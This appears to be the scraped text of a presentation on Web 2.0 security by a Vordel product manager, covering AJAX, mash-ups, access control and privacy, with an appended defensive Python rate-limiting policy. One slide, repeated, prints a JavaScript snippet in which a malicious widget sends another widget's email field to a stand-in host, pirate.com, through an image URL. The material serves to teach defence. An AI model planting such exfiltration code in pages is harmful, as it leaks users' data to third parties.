Web 2.0 and Security Richard Mooney - Product Manager - Vordel
Web 2.0 and Security
Security Basics
What is Web 2.0?
Web 2.0 Architecture
User Experience
How does it work?
Underlying Technologies: On the client side: Scripting the "XHR"

    // Kick off the XMLHttpRequest and set the callback
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("GET", url, true);
    xmlhttp.onreadystatechange = doSomethingWithResponse;
    xmlhttp.send(null);

    // Do something with the data fetched from the server
    function doSomethingWithResponse() {
        // readyState 4 means the whole response has arrived; ignore earlier events
        if (xmlhttp.readyState !== 4 || xmlhttp.status !== 200) {
            return;
        }
        var xmlResponse = xmlhttp.responseXML;
        var message = xmlResponse.getElementsByTagName('message').item(0).firstChild.data;
        document.getElementById('message').value = message;
    }
Underlying Technologies: On the server side - REST-style Web Services
Underlying Technologies: Invoking a Web 2.0 Web Service
Underlying Technologies: Combining Information Sources: Mash-ups
Underlying Technologies: Windows Live
Some mash-ups use server-side proxies to allow AJAX code to fetch data from multiple different domains. Users can add "widgets" to the Windows Live dashboard.
Access Control: Definition
The ability to control access to a service based on identity.
Access Control: Basics
Access Control: Data Harvesting
Web 2.0 applications make use of Web Services on the server side to send data asynchronously to the client. What if someone ignores the client altogether and writes their own application to harvest all of the data off the server? Policies can be used to ensure that only authenticated users can access the back-end Web Services. Policies can also be used to protect against data harvesting.
Access Control: Recommendation
Integrity & Non-Repudiation: Definition
Integrity: Maintaining Data, System & User Integrity
Integrity: Who is your user?
How was this OpenID provisioned? Is there a way of physically tying it to an identity, such as mailing it out to the user? Is something like PKI the answer?
Integrity & Non-Repudiation: Recommendation
Availability: Definition
Availability: The Size of the Attack Surface
Availability: XML Security and AJAX
Availability: Filter Inbound and Outbound XML
Availability: Securing the Data Sent in Web 2.0
Availability: Recommendation
Privacy & Confidentiality: Definition
Privacy: JavaScript Vulnerabilities
Privacy: Prototype Hijacking
Privacy: Another Technique for Spying in a Mash-up
Described by Anton Rager and Jeremiah Grossman: the malicious widget can simply read the innerHTML of other widgets on the same page, then hive the data off to a third-party server by appending it to an IMG tag:

    spyImage = document.createElement('img');
    spyImage.src = 'http://www.pirate.com/sniff.html?' + document.getElementById('newEmail').value;

Privacy: Information Leakage in the Audit Trail
Privacy: Code Injection & Cross-Site Scripting
Privacy: Recommendation
Conclusions
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 

Web 20 Security - Vordel

  • 1. Web 2.0 and Security Richard Mooney - Product Manager - Vordel
  • 8. Underlying Technologies: On the client side: Scripting the “XHR”
      // Kick off the XMLHttpRequest, set the callback
      xmlhttp = new XMLHttpRequest();
      xmlhttp.open("GET", url, true);
      xmlhttp.onreadystatechange = doSomethingWithResponse;
      xmlhttp.send(null);

      // do something with the data fetched from the server
      function doSomethingWithResponse() {
        if (xmlhttp.readyState !== 4) return; // callback fires on every state change; wait for the complete response
        var xmlResponse = xmlhttp.responseXML;
        var message = xmlResponse.getElementsByTagName('message').item(0).firstChild.data;
        document.getElementById('message').value = message;
      }
  • 12. Underlying Technologies: Windows Live. Some mash-ups use server-side proxies to allow AJAX code to fetch data from multiple different domains. Users can add “widgets” to the Windows Live dashboard.
  • 13. Access Control: Definition. The ability to control access to a service based on identity.
  • 15. Access Control: Data Harvesting. Web 2.0 applications make use of Web Services on the server side to send data asynchronously to the client. What if you forget about the client and write your own application to data-harvest all of the data off the server? Policies can be used to ensure that only authenticated users can access the back-end Web Services. Policies can also be used to protect against data harvesting.
  • 30. Privacy: Another technique for spying in a Mash-up. Described by Anton Rager and Jeremiah Grossman: the malicious widget can simply view the innerHTML of other widgets on the same page, then hive off the data to a third-party server by appending it to an IMG tag:
      spyImage = document.createElement('img');
      spyImage.src = 'http://www.pirate.com/sniff.html?' + document.getElementById('newEmail').value;
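The access-control point described on slide 15 (only authenticated users reach the back-end Web Service, and bulk data harvesting is throttled), as an added example that is not Vordel's code: a constructed in-memory policy placed in front of a REST-style Web Service. The session store, the window size, the record cap and the record ids are assumptions made for the example.

```python
from collections import defaultdict, deque

# Constructed session store: token -> identity. A real deployment would
# validate a signed token or consult a session server instead.
SESSIONS = {"tok-alice-1": "alice", "tok-bob-7": "bob"}

WINDOW_SECONDS = 60          # sliding window for the harvesting check
MAX_RECORDS_PER_WINDOW = 20  # distinct records one identity may fetch per window


class AccessPolicy:
    """Policy enforcement point evaluated before each back-end GET."""

    def __init__(self, sessions=SESSIONS, window=WINDOW_SECONDS,
                 max_records=MAX_RECORDS_PER_WINDOW):
        self.sessions = sessions
        self.window = window
        self.max_records = max_records
        self._history = defaultdict(deque)  # identity -> (timestamp, record_id)
        self.audit_log = []                  # denied requests, for the SOC

    def _prune(self, identity, now):
        # Drop history older than the window so the limit is a sliding one.
        hist = self._history[identity]
        while hist and now - hist[0][0] >= self.window:
            hist.popleft()

    def evaluate(self, token, record_id, now):
        """Return (allowed, reason) for a request to read one record."""
        identity = self.sessions.get(token)
        if identity is None:  # policy 1: unauthenticated callers never reach the service
            self.audit_log.append(("DENY", None, record_id, "unauthenticated"))
            return False, "unauthenticated"
        self._prune(identity, now)
        hist = self._history[identity]
        distinct = {rid for _, rid in hist}
        # Policy 2: a browser user re-reads a few records; a harvesting script
        # walks the whole store, so cap *distinct* records per window.
        if record_id not in distinct and len(distinct) >= self.max_records:
            self.audit_log.append(("DENY", identity, record_id, "harvesting"))
            return False, "harvesting"
        hist.append((now, record_id))
        return True, "ok"


def simulate_harvest(policy, token, count, start=0.0):
    """Constructed run: one identity walks `count` records, one per second.
    Returns how many requests the policy let through."""
    allowed = 0
    for i in range(count):
        ok, _ = policy.evaluate(token, f"rec-{i}", start + i)
        allowed += ok
    return allowed
```

Refetching a record already seen in the window does not count toward the cap, so ordinary interactive use is unaffected while a scripted walk of the data store stops at the twentieth new record until the window slides.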